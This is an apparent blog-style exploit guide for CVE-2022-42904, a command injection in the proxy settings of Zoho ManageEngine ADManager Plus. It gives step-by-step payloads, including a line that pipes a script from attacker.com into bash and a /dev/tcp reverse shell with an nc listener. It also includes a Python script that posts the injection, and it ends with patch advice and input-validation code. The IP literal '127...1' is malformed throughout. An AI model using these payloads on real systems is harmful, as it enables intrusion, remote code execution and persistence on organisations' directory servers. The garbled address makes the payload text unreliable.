Zoho ManageEngine ADManager Plus is a widely used Active Directory management and reporting tool, found in schools, businesses, government, and more. Frighteningly, a serious vulnerability was discovered in its proxy settings — allowing an authenticated admin user to execute arbitrary system commands. This bug is tracked as CVE-2022-42904.

Let’s break down what this means, how it works, and how attackers can exploit it. Simple language. Step-by-step. PoC included.

Vulnerability Type: Authenticated Command Injection via Proxy Settings

- Authentication Required: Yes. You need to be an admin or at least authenticated against the web panel.

Official reference:  
- Zoho Security Advisory
- NIST NVD Entry

Where’s the Problem?

Admins can configure the proxy server used by ADManager Plus via the web panel, under Admin → Proxy Settings.

The field intended for a hostname or IP address (proxyAddress, for example) wasn't sanitized properly. If the value contains shell metacharacters such as ; or &, the backend passes it into a system command without neutralizing them, so the text after the separator runs as a command of its own. That means: whatever system command you append to your proxy setting, the Zoho backend will try to execute it on the server.

What Could an Attacker Do?

If an attacker has admin credentials (a not-so-rare scenario in over-privileged environments), they can:

- Dump system files (list users, read sensitive files, etc.)
- Install malware/persistent backdoors
- Jump/lateral move to other systems

REMEMBER: This attack requires authentication. But with phishing, weak creds, or insider threats, this is quite realistic.

1. Log in as Admin

Navigate to:  
https://<your-admanager-plus>:<port>/

2. Go to Proxy Settings

In the web panel, browse to:  
Admin → Proxy Settings

You'll see fields like "Proxy Host", "Proxy Port", etc.

Payload Example (Linux)

127...1;curl http://attacker.com/evil.sh|bash

Or, to simply execute a harmless command:

127...1; id; #

What this does: instead of just using "127...1" as a host, it appends ; (end of command), and everything after it is executed as a new system command.

For Windows

127...1 & whoami & rem

4. Save and Trigger

Save the settings. In some cases, the proxy settings are used immediately (for testing connectivity) or at the next scheduled task/connection (LDAP sync, internet fetch).

When triggered, your payload runs as the system account hosting ADManager Plus.

If you want shell access, set up a listener on your attacking machine:

nc -lvnp 4444

Then, inject this into the Proxy Host field:

127...1; /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 >&1'

The same request, sent directly with Python:

```python
import requests

# Target URL and session cookie are placeholders; fill in your own.
url = 'https://target-admanager:808/EditProxyDetails.do'
cookies = {'JSESSIONID': 'your-session-id'}
# Form fields of the proxy-settings save request; proxyAddress carries the payload.
data = {
    "proxyAddress": "127...1;id;#",
    "proxyPort": "808",
    "proxyUser": "",
    "proxyPassword": ""
}

r = requests.post(url, cookies=cookies, data=data, verify=False)
print(r.status_code)
```

*Replace fields as needed.*

Fix & Mitigation

Update Immediately!  
Zoho patched this in build 7152 and later. If you’re not updated, you’re at serious risk.

- Security Update Page
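For context on what the fix has to look like, here is an added illustration of the class of control that closes this bug (this is not Zoho's code and not the actual patch): validate the proxy host against an allowlist of IP literals and RFC 1123 hostnames, and build any connectivity check as an argv list instead of a shell string. The function names and the curl-based check are assumptions for the example.

```python
import ipaddress
import re
from typing import List, Optional

# One RFC 1123 hostname label: letters, digits, inner hyphens, 1-63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def is_valid_proxy_host(value: str) -> bool:
    """Allowlist check for the proxy host field.

    Accepts an IP literal (v4 or v6) or an RFC 1123 hostname and nothing
    else, so ';', '&', '|', spaces and quotes are rejected before the value
    gets anywhere near a command line.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def is_valid_proxy_port(value: str) -> bool:
    """Port must be a plain decimal number in 1..65535."""
    return value.isdigit() and 1 <= int(value) <= 65535


def connectivity_check_argv(host: str, port: str) -> Optional[List[str]]:
    """Return the connectivity-test command as an argv list, or None if rejected.

    Hypothetical helper: an argv list is handed to subprocess.run() without
    shell=True, so the program receives the value verbatim and no shell ever
    parses a ';' or '&' out of it. Layered with the allowlist above, the
    payloads shown on this page never reach a shell at all.
    """
    if not (is_valid_proxy_host(host) and is_valid_proxy_port(port)):
        return None
    return ["curl", "--proxy", f"http://{host}:{port}",
            "--max-time", "5", "https://example.com/"]
```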

Conclusion

CVE-2022-42904 in Zoho ManageEngine ADManager Plus is an example of how an overlooked input field can lead to disaster, even in supposedly “secure” admin panels. The fact that it’s authenticated makes it less critical in some eyes — but with weak passwords or insider actors, this could lead to a full environment compromise.

Patch fast. Audit admin activity. Don’t trust ANY web field ever!

References for further reading:  
- NIST: CVE-2022-42904  
- Zoho Official Advisory  
- Rapid7 Analysis

Timeline

Published on: 11/18/2022 21:15:00 UTC
Last modified on: 11/22/2022 16:13:00 UTC